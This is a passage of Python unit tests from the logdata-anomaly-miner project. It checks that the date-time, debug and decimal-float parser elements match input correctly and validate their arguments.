date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) def 
test17date_before_unix_timestamps(self): """Check if timestamps before the unix timestamp are processed properly.""" data = b"01.01.1900 11:40:00: it still works" date = b"01.01.1900 11:40:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, -2208946800, None) def test18element_id_input_validation(self): """Check if element_id is validated.""" date_format = b"%d.%m.%Y %H:%M:%S" self.assertRaises(ValueError, DateTimeModelElement, "", date_format) # empty element_id self.assertRaises(TypeError, DateTimeModelElement, None, date_format) # None element_id self.assertRaises(TypeError, DateTimeModelElement, b"path", date_format) # bytes element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, True, date_format) # boolean element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, 123, date_format) # integer element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, 123.22, date_format) # float element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, {"id": "path"}, date_format) # dict element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, ["path"], date_format) # list element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, [], date_format) # empty list element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, (), date_format) # empty tuple element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, set(), date_format) # empty set element_id is not allowed def test19date_format_input_validation(self): """Check if date_format is validated and only valid values can be entered.""" allowed_format_specifiers = b"bdfHMmSsYz%" # check if allowed values do not raise any 
exception. format_specifiers = b"" for c in allowed_format_specifiers: format_specifiers += b"%" + str(chr(c)).encode() DateTimeModelElement(self.id_, b"%" + str(chr(c)).encode()) # check if all allowed values can not be used together. An exception should be raised, because of multiple month representations # and %s with non-second formats. self.assertRaises(ValueError, DateTimeModelElement, self.id_, format_specifiers) DateTimeModelElement(self.id_, format_specifiers.replace(b"%m", b"").replace(b"%s", b"")) DateTimeModelElement(self.id_, format_specifiers.replace(b"%b", b"").replace(b"%s", b"")) DateTimeModelElement(self.id_, b"%s%z%f") for c in allowed_format_specifiers.replace(b"s", b"").replace(b"z", b"").replace(b"f", b"").replace(b"%", b""): self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%s%" + str(chr(c)).encode()) # test non-existent specifiers for c in b"aceghijklnopqrtuvwxyABCDEFGIJKLNOPQRTUVWXZ": self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%" + str(chr(c)).encode()) # test multiple specifiers. % and z specifiers are allowed multiple times. 
DateTimeModelElement(self.id_, b"%%%z%z") for c in allowed_format_specifiers.replace(b"%", b"").replace(b"z", b""): self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%" + str(chr(c)).encode() + b"%" + str(chr(c)).encode()) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"") # empty date_format self.assertRaises(TypeError, DateTimeModelElement, self.id_, None) # None date_format self.assertRaises(TypeError, DateTimeModelElement, self.id_, "") # string date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, 123) # integer date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, 123.22) # float date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, True) # boolean date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, {"id": "path"}) # dict date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, ["path"]) # list date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, []) # empty list date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, ()) # empty tuple date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, set()) # empty set date_format is not allowed def test20time_zone_input_validation(self): """Check if time_zone is validated and only valid values can be entered.""" dtme = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S") self.assertEqual(dtme.time_zone, timezone.utc) DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) for tz in pytz.all_timezones: DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", pytz.timezone(tz)) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", b"UTC") self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", "UTC") self.assertRaises(TypeError, DateTimeModelElement, self.id_, 
b"%d.%m.%Y %H:%M:%S", 1) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", 1.25) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", True) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", {"time_zone": timezone.utc}) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", [timezone.utc]) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", []) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", set()) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", ()) def test21text_locale_input_validation(self): """ Check if text_locale is validated and only valid values can be entered. An exception has to be raised if the locale is not installed on the system. """ DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, "en_US.UTF-8") DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, ("en_US", "UTF-8")) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, 1) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, 1.2) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, True) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, ["en_US", "UTF-8"]) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, {"en_US": "UTF-8"}) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, tuple("en_US.UTF-8")) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, set()) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, ()) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, ("en_US", "UTF-8", 
"de_AT", "UTF-8"))

    def test22start_year_input_validation(self):
        """
        Check if start_year is validated.

        None selects the current year, any int is accepted, and bool/str/float/containers
        raise TypeError. NOTE(review): the constructor applies no range check to the year
        (a negative year constructs without error) - confirm that this is intended.
        """
        dtme = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, None, None)
        # None -> current year.
        self.assertEqual(dtme.start_year, datetime.now().year)
        DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, 2020)
        # No lower bound is enforced: -630 is accepted as-is.
        DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, -630)
        self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, "2020")
        # bool is a subclass of int but must be rejected explicitly.
        self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, True)
        self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, 1.25)
        self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, [2020])
        self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, [])
        self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, {"key": 2020})
        self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, set())
        self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, ())

    def test23max_time_jump_seconds_input_validation(self):
        """
        Check if max_time_jump_seconds is validated.

        The default is 86400 (24 * 3600). Zero and negative values raise ValueError,
        while bool/str/float/containers raise TypeError.
        """
        dtme = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, None, None)
        self.assertEqual(dtme.max_time_jump_seconds, 86400)
        DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, 100000)
        # Non-positive windows are rejected with ValueError, not TypeError.
        self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, -1)
        self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, 0)
        self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, "100000")
        # bool is a subclass of int but must be rejected explicitly.
        self.assertRaises(TypeError,
                          DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, True)
        self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, 1.25)
        self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, [2020])
        self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, [])
        self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, {"key": 2020})
        self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, ())
        self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, set())

    def test24get_match_element_match_context_input_validation(self):
        """
        Check if an exception is raised, when other classes than MatchContext are used in get_match_element.

        Both the real MatchContext and the test DummyMatchContext are accepted. Everything
        else fails with AttributeError rather than TypeError - presumably the element reads
        attributes of the context object instead of checking its type up front; confirm
        against DateTimeModelElement.get_match_element.
        """
        model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S")
        data = b"07.02.2019 11:40:00: it still works"
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None))
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, data)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, True)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, None)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, [])
        self.assertRaises(AttributeError, model_element.get_match_element, self.path,
{"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test25performance(self): """Test the performance of the implementation.""" run_test = False import_setup = """ import copy from unit.TestBase import DummyMatchContext from aminer.parsing.DateTimeModelElement import DateTimeModelElement times = 100000 """ string_no_z_setup = """ date = b"[18/Oct/2021:16:12:55" dtme = DateTimeModelElement("s0", b"[%d/%b/%Y:%H:%M:%S") """ string_z1_setup = """ date = b"[18/Oct/2021:16:12:55 UTC+0100" dtme = DateTimeModelElement("s0", b"[%d/%b/%Y:%H:%M:%S%z") """ string_z2_setup = """ date = b"[18/Oct/2021:16:12:55 +0000]" dtme = DateTimeModelElement("s0", b"[%d/%b/%Y:%H:%M:%S%z") """ end_setup = """ dummy_match_context = DummyMatchContext(date) dummy_match_context_list = [copy.deepcopy(dummy_match_context) for _ in range(times)] def run(): match_context = dummy_match_context_list.pop(0) dtme.get_match_element("match", match_context) """ no_z_setup = import_setup + string_no_z_setup + end_setup z1_setup = import_setup + string_z1_setup + end_setup z2_setup = import_setup + string_z2_setup + end_setup if run_test: import timeit times = 100000 print() print("Every date is run %d times." 
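% times)
            t = timeit.timeit(setup=no_z_setup, stmt="run()", number=times)
            print("No %z parameter ([18/Oct/2021:16:12:55): ", t)
            t = timeit.timeit(setup=z1_setup, stmt="run()", number=times)
            print("Date with %z parameter (18/Oct/2021:16:12:55 UTC+0100): ", t)
            t = timeit.timeit(setup=z2_setup, stmt="run()", number=times)
            print("Date with %z parameter (18/Oct/2021:16:12:55 +0000): ", t)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/DebugModelElementTest.py000066400000000000000000000110471500476301700301610ustar00rootroot00000000000000
import unittest
import sys
from io import StringIO  # public module; the original imported the private _io implementation
from aminer.parsing.DebugModelElement import DebugModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase, DummyMatchContext


class DebugModelElementTest(TestBase):
    """Unittests for the DebugModelElement."""

    id_ = "debug"
    path = "path"

    def test1get_match_element_valid_match(self):
        """
        Parse data and check if the MatchContext was not changed.

        DebugModelElement writes to stderr when it is constructed and on every
        get_match_element call, where it echoes repr() of the still-unmatched data.
        stderr is captured in a StringIO for the duration of the test and restored in a
        finally block, so a failing assertion cannot leave sys.stderr redirected for the
        remaining tests of the run (the original restored it only on the success path).
        """
        old_stderr = sys.stderr
        output = StringIO()
        sys.stderr = output
        try:
            debug_model_element = DebugModelElement(self.id_)
            self.assertEqual(output.getvalue(), "DebugModelElement %s added\n" % self.id_)
            output.seek(0)
            output.truncate(0)

            data = b"some data"
            match_context = DummyMatchContext(data)
            match_element = debug_model_element.get_match_element(self.path, match_context)
            # NOTE(review): the raw unmatched log data is copied to stderr here. This element
            # is a debugging aid; it should not remain in production parser models, or log
            # content ends up duplicated on stderr.
            self.assertEqual(
                output.getvalue(), 'DebugModelElement path = "%s", unmatched = "%s"\n' % (
                    match_element.get_path(), repr(match_context.match_data)))
            # Empty match string and match object: the element consumes nothing.
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, b"", b"", None)
            output.seek(0)
            output.truncate(0)

            data = b"123 0x2a. [\"abc\"]:"
            match_context = DummyMatchContext(data)
            match_element = debug_model_element.get_match_element(self.path, match_context)
            self.assertEqual(
                output.getvalue(), 'DebugModelElement path = "%s", unmatched = "%s"\n' % (
                    match_element.get_path(), repr(match_context.match_data)))
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, b"", b"", None)
        finally:
            # Always undo the redirection, even when an assertion above fails.
            sys.stderr = old_stderr

    def test2element_id_input_validation(self):
        """Check if element_id is validated: only a non-empty str is accepted."""
        self.assertRaises(ValueError, DebugModelElement, "")  # empty element_id
        self.assertRaises(TypeError, DebugModelElement, None)  # None element_id
        self.assertRaises(TypeError, DebugModelElement, b"path")  # bytes element_id is not allowed
        self.assertRaises(TypeError, DebugModelElement, True)  # bool element_id is not allowed
        self.assertRaises(TypeError, DebugModelElement, 123)  # integer element_id is not allowed
        self.assertRaises(TypeError, DebugModelElement, 123.22)  # float element_id is not allowed
        self.assertRaises(TypeError, DebugModelElement, {"id": "path"})  # dict element_id is not allowed
        self.assertRaises(TypeError, DebugModelElement, ["path"])  # list element_id is not allowed
        self.assertRaises(TypeError, DebugModelElement, [])  # empty list element_id is not allowed
        self.assertRaises(TypeError, DebugModelElement, ())  # empty tuple element_id is not allowed
        self.assertRaises(TypeError, DebugModelElement, set())  # empty set element_id is not allowed

    def test3get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element."""
        # Note: constructing the element here writes its "added" line to the real stderr.
        model_element = DebugModelElement(self.id_)
        data = b"abcdefghijklmnopqrstuvwxyz.!?"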
model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/DecimalFloatValueModelElementTest.py000066400000000000000000000655201500476301700324610ustar00rootroot00000000000000import unittest from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class DecimalFloatValueModelElementTest(TestBase): """Unittests for the DecimalFloatValueModelElement.""" id_ = "float" path = "path" def test1get_match_element_default_values(self): """Test valid float values with default values of value_sign_type, value_pad_type and exponent_type.""" 
decimal_float_value_me = DecimalFloatValueModelElement( self.id_, DecimalFloatValueModelElement.SIGN_TYPE_NONE, DecimalFloatValueModelElement.PAD_TYPE_NONE, DecimalFloatValueModelElement.EXP_TYPE_NONE) data = b"22.25 some string." value = b"22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.25, None) data = b"0.25 some string." value = b"0.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.25, None) data = b"22 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22.12.2021 some string." value = b"22.12" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.12, None) data = b"22. some string" value = b"22." 
match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.0, None) data = b"0 some string" value = b"0" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) def test2get_match_element_default_values_no_match(self): """Test not matching values with default values of value_sign_type, value_pad_type and exponent_type.""" decimal_float_value_me = DecimalFloatValueModelElement( self.id_, DecimalFloatValueModelElement.SIGN_TYPE_NONE, DecimalFloatValueModelElement.PAD_TYPE_NONE, DecimalFloatValueModelElement.EXP_TYPE_NONE) data = b"+22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"-22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"22,25" value = b"22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b".25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"0025" match_context = DummyMatchContext(data) match_element = 
decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"1e-5" value = b"1" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"e+10" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"1e+0" value = b"1" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"00" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_optional_zero_values(self): """Test valid float values with "optional" or "zero" values of value_sign_type, value_pad_type and exponent_type.""" decimal_float_value_me = DecimalFloatValueModelElement( self.id_, DecimalFloatValueModelElement.SIGN_TYPE_OPTIONAL, DecimalFloatValueModelElement.PAD_TYPE_ZERO, DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL) data = b"22.25 some string." 
value = b"22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.25, None) data = b"-22.25 some string." value = b"-22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -22.25, None) data = b"0.25 some string." value = b"0.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.25, None) data = b"22 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22.12.2021 some string." value = b"22.12" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.12, None) data = b"22. some string" value = b"22." 
match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.0, None) data = b"025 some string" value = b"025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25, None) data = b"0025 some string" value = b"0025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25, None) data = b"0025.22 some string" value = b"0025.22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25.22, None) data = b"1e-5 some string" value = b"1e-5" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1e-5, None) data = b"1e+0 some string" value = b"1e+0" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"0 some string" value = b"0" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) data = b"00 some string" value = b"00" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) 
self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None)

    def test4get_match_element_optional_zero_values_no_match(self):
        """
        Test not matching values with "optional" or "zero" values of value_sign_type, value_pad_type and exponent_type.

        As pinned below, SIGN_TYPE_OPTIONAL admits only a leading minus: "+22.25" is
        rejected here while test3 accepts "-22.25" with the same configuration.
        """
        decimal_float_value_me = DecimalFloatValueModelElement(
            self.id_, DecimalFloatValueModelElement.SIGN_TYPE_OPTIONAL, DecimalFloatValueModelElement.PAD_TYPE_ZERO,
            DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL)
        # A leading "+" is not accepted as an optional sign.
        data = b"+22.25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

        # A comma is not a decimal separator: the match stops before it and yields 22.
        data = b"22,25"
        value = b"22"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None)

        # No digit before the decimal point.
        data = b".25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

        # Leading blanks are not accepted with PAD_TYPE_ZERO.
        data = b" 25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

        # Listed twice in this file; possibly a multi-blank variant whose spacing was collapsed.
        data = b" 25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

        # An exponent without a mantissa.
        data = b"e+10"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

    def test5get_match_element_mandatory_blank_values(self):
        """Test valid float values with "mandatory" or "blank" values of value_sign_type, value_pad_type and exponent_type."""
        decimal_float_value_me = DecimalFloatValueModelElement(
            self.id_,
DecimalFloatValueModelElement.SIGN_TYPE_MANDATORY, DecimalFloatValueModelElement.PAD_TYPE_BLANK, DecimalFloatValueModelElement.EXP_TYPE_MANDATORY) data = b"+22.25e-5 some string." value = b"+22.25e-5" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.0002225, None) data = b"-22.25e+5 some string." value = b"-22.25e+5" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -2225000, None) data = b"+0.25e+1 some string." value = b"+0.25e+1" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 2.5, None) data = b"+22e-3 some string." value = b"+22e-3" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.022, None) data = b"+22e-5. 
some string" value = b"+22e-5" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.000220, None) data = b"+ 25e+1 some string" value = b"+ 25e+1" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 250, None) data = b"- 25e-17 some string" value = b"- 25e-17" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -25e-17, None) data = b"+22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"+1e-5 some string" value = b"+1e-5" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1e-5, None) data = b"+1e+0 some string" value = b"+1e+0" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"+ 1e+0 some string" value = b"+ 1e+0" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"+0e-3 some string" value = b"+0e-3" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) 
self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None)

    def test6get_match_element_mandatory_blank_values_no_match(self):
        """
        Test not matching values with "mandatory" or "blank" values of value_sign_type and value_pad_type.

        NOTE(review): unlike test5 this instance uses EXP_TYPE_OPTIONAL, so the
        mandatory-exponent rejection path (a signed value without an exponent) is not
        exercised by this test; the rejections below presumably come from the sign and
        padding rules - confirm against the element implementation.
        """
        decimal_float_value_me = DecimalFloatValueModelElement(
            self.id_, DecimalFloatValueModelElement.SIGN_TYPE_MANDATORY, DecimalFloatValueModelElement.PAD_TYPE_BLANK,
            DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL)
        # Unsigned value.
        data = b"22.25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
